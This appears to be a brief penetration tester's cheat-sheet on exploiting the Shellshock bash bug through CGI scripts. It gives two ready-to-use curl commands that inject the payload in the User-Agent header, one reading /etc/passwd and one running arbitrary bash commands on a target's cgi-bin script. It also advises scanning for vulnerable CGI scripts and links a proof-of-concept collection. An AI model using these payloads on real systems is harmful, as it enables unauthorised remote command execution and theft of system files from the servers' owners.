Most importantly must be a cgi-bin! (DONT USE CURL, USE BURP)
Read: curl -v -H "User-Agent: () { :;}; echo $(</etc/passwd)" https://IP/cgi-bin/status
Run/Write: curl -v -H "User-Agent: () { :;}; echo; /bin/bash -c 'COMMAND'" https://IP/cgi-bin/status
Try to scan for cgi, sh, pl, py in cgi-bin for this!
However this can happen on various other service also!!!! (not only web, take note):
https://github.com/mubix/shellshocker-pocs​ ​